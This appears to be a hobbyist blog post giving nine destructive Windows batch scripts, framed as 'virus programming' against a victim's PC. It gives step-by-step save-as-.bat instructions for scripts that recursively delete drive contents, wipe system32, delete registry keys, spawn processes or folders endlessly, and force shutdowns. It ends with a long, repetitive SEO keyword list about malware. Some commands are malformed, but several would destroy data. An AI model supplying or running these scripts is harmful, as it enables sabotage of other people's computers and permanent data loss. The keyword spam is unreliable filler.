Learn virus programming

(with source code)
DISCLAIMER:-
I'll teach you virus programming but any kind of mistake or mishap's can harm your pc. I shall not be responsible for any kind of destruction. You can do this at your own risk.












ABOUT:
In this blog post, we learn about virus programming, There codes and there effects on pc








1st virus program:

Create Unlimited Folders:


In the first virus program we learn how to create Unlimited Folders in Victim's pc. Due to this virus, the victim's pc become crashed.

This virus program generates "n" number of folders in computer partitions, this is a highly effective virus program


1. First  open  NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).

CODE:

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
cd /d F:
md %RANDOM%
cd /d G:
md %RANDOM%
goto VIRUS


NOTE: Save the above CODE in .bat extension.





2nd virus program:

Create folders on desktop:


In this virus program we learn how to create a virus that creates unlimited folders in the desktop of the victim's pc. This virus makes computer crash if this virus doesn't stop this make your computer a piece of shit.

1. First  open  NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).

CODE:

@echo off
cd"C:\documents and settings\All users\desktop"
:folder
md %random%
goto folder


NOTE: Save the above CODE in .bat extension.



3rd virus program:

Format all drives;


In this virus program, I'll teach you how to create a virus which has the ability to format all computer drives/partitions.

This is also a very effective & dangerous virus program that can delete all your data in seconds.


1. First open  NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).

CODE:

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q


NOTE: Save the above CODE in .bat extension.



4th virus program:

Delete window OS:


In this virus program I'll teach you a virus code which has ability to Delete Window Operating System.

All the files of Window's and all the data in C partition delete by executing this virus program in victim's pc.



1. First open  NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).

CODE:

del c:\WINDOWS\system32\*.*/q


NOTE: Save the above CODE in .bat extension


5th virus program:

Delete Window  Registry Files:


In this virus program, I'll teach you that how you can delete registry files of victim's pc by only a small batch file virus program.

This virus program deletes all registry files of Windows Os and the window become a piece of shit. Window becomes useless after executing this virus program.



1. First open  NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).

CODE:

@echo off
START reg delete HKCR/.exe
START reg delete HKCR/.dil
START reg delete HKCR/*


NOTE: Save the above CODE in .bat extension


6th virus program

 Lag the pc:


In this virus program, I'll teach you how you can create a virus program that has the ability to Lag the pc by open command prompt again.

By generating a large number of requests to open command prompt pc will lag. This is also an effective virus.




1. First open  NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).
CODE:

@echo off
:A
Start
goto :A

NOTE: Save the above CODE in .bat extension



7th virus program:

Lag the pc:


In this virus program, I'll teach you how you can create a virus program that has the ability to Lag the pc by open websites in the background again.

By generating a large number of requests to open websites pc will lag. Maybe the window will corrupt. This is also an effective virus.


1. First open  NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).

CODE:

@echo off
:a
start www.youtube.com
start www.youtube.com
start www.youtube.com
start www.twitter.com
start www.yahoo.com
start www.google.com
start www.instagram.com
goto :a



NOTE: Save the above CODE in .bat extension



8th virus program:

Taskkill virus:


 in this virus program, I'll teach you how to create a virus program that has ability to kill all the tasks that pc is performed.

This virus program is very small but its work is big. It can kill all the tasks and those tasks which are performed by pc in the background.


1. First open  NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).


CODE:

@echo off
taskkill explorer.exe


NOTE: Save the above CODE in .bat extension


9th virus program

Shutdown pc:


In this virus program, I'll teach you how to shutdown the victim's pc remotely. You only Execute the below virus program. After 30 seconds the pc will shut down automatically.

1. First open  NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).
CODE:

shutdown -s -t 30 -c "YOU ARE HACKED"


NOTE: Save the above CODE in .bat extension








Visit my youtube channel https://www.youtube.com/watch?v=5PrSku288LA&t=247s



CHECK THIS





                                                                       CHECK THIS

COMING SOON


how to code virus
computer virus source code example
c++ virus source code
c++ virus development
how to make antivirus software in c++
how to write malware in java
the little black book of viruses
why users create viruses
jeffrey parson
virus creation course
how to create a virus using c
how to make a computer virus that spreads
types of computer virus
boot sector virus
computer virus names
classification of computer virus
computer worm
symptoms of computer virus
short note on botnet
virus code in notepad
life cycle of computer virus
learn computer virus
how to create a virus to destroy a computer
how to make a real virus using notepad
notepad virus prank
virus code for android
how to make computer virus instructables
how to make a virus on windows
how to create a virus using notepad harmless
how to make a virus with notepad
how to create virus in mobile
polymorphic code
python virus code pdf
python-virus github
best programming language for viruses
computer virus algorithm
writing malware in python
virus source code example
how to code virus
computer virus source code example
c++ virus source code
c++ virus development
how to make antivirus software in c++
how to write malware in java
the little black book of viruses
why users create viruses
jeffrey parson
virus creation course
how to create a virus using c
how to make a computer virus that spreads
types of computer virus
boot sector virus
computer virus names
classification of computer virus
computer worm
symptoms of computer virus
short note on botnet
virus code in notepad
life cycle of computer virus
learn computer virus
how to create a virus to destroy a computer
how to make a real virus using notepad
notepad virus prank
virus code for android
how to make computer virus instructables
how to make a virus on windows
how to create a virus using notepad harmless
how to make a virus with notepad
how to create virus in mobile
polymorphic code
python virus code pdf
python-virus github
best programming language for viruses
computer virus algorithm
writing malware in python
virus source code example
how to create malware in python
how to make malware for android
c++ malware source code
fud ransomware
what language are rootkits written in
how to create a malware virus using notepad
keylogger using c++
how to make computer virus instructables
how do people create computer virus
nuke virus source code
how a virus is created
how to create a computer virus using python
how to create a trojan virus pdf
how to make a trojan virus for android
how to make a trojan virus in python
how to write a worm in python
computer virus tutorial pdf
internet worm maker thing
the little black book of viruses
why users create viruses
jeffrey parson
how to write a virus in python
best programming language to write viruses
how to make a computer virus that spreads
how to make a virus with notepad
how to create virus in mobile
how to make a virus on windows
polymorphic code
python virus code pdf
python-virus github
best programming language for viruses
computer virus algorithm
writing malware in python
virus source code example
how to make a real virus using notepad
notepad virus prank
virus code for android
how to create a virus using notepad harmless
how to create malware in python
how to make malware for android
c++ malware source code
fud ransomware
what language are rootkits written in
how to create a malware virus using notepad
keylogger using c++
how to make computer virus instructables
how do people create computer virus
nuke virus source code
how a virus is created
how to create a computer virus using python
how to create a trojan virus pdf
how to make a trojan virus for android
how to make a trojan virus in python
how to write a worm in python
computer virus tutorial pdf
internet worm maker thing
the little black book of viruses
why users create viruses
jeffrey parson
how to write a virus in python
best programming language to write viruses
how to make a computer virus that spreads
how to make a virus with notepad
how to create virus in mobile
how to make a virus on windows
polymorphic code
python virus code pdf
python-virus github
best programming language for viruses
computer virus algorithm
writing malware in python
virus source code example
how to make a real virus using notepad
notepad virus prank
virus code for android
how to create a virus using notepad harmless